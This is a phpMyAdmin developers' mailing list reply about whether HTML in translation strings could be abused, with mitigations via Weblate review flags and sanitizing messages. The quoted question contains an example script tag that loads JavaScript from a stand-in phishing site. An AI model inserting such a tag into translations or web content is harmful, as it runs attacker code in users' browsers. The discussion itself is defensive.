[Phpmyadmin-devel] What are the chances that irrelevant translations would go unnoticed?

Michal Čihař michal at cihar.com
Wed Jul 2 13:11:57 CEST 2014


Hi

Dne Wed, 2 Jul 2014 16:02:23 +0530
Chirayu Chiripal <chirayu.chiripal at gmail.com> napsal(a):

> I have seen few translations using html tags in them. I was shocked, that
> why html tags are allowed in translations.
> Isn't it possible that someone can insert tags like this <script src="
> http://www.some-phishing-site.com/simple.js"></script> with the translation
> and can be used to attack users of particular language??

Technically it is possible, though markup changes is something I always
check (Weblate has flag for this, so it's quite easy to review), so that
will not get in. Indeed it would be better to use always just bbcode and
pass all strings though PMA_sanitize(), but that means somebody would
have to go through the code and fix the messages :-).

PS: I hope you don't mind bringing this back to -devel list.

-- 
	Michal Čihař | http://cihar.com | http://blog.cihar.com
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 836 bytes
Desc: not available
URL: <http://lists.phpmyadmin.net/pipermail/developers/attachments/20140702/da884659/attachment.sig>


More information about the Developers mailing list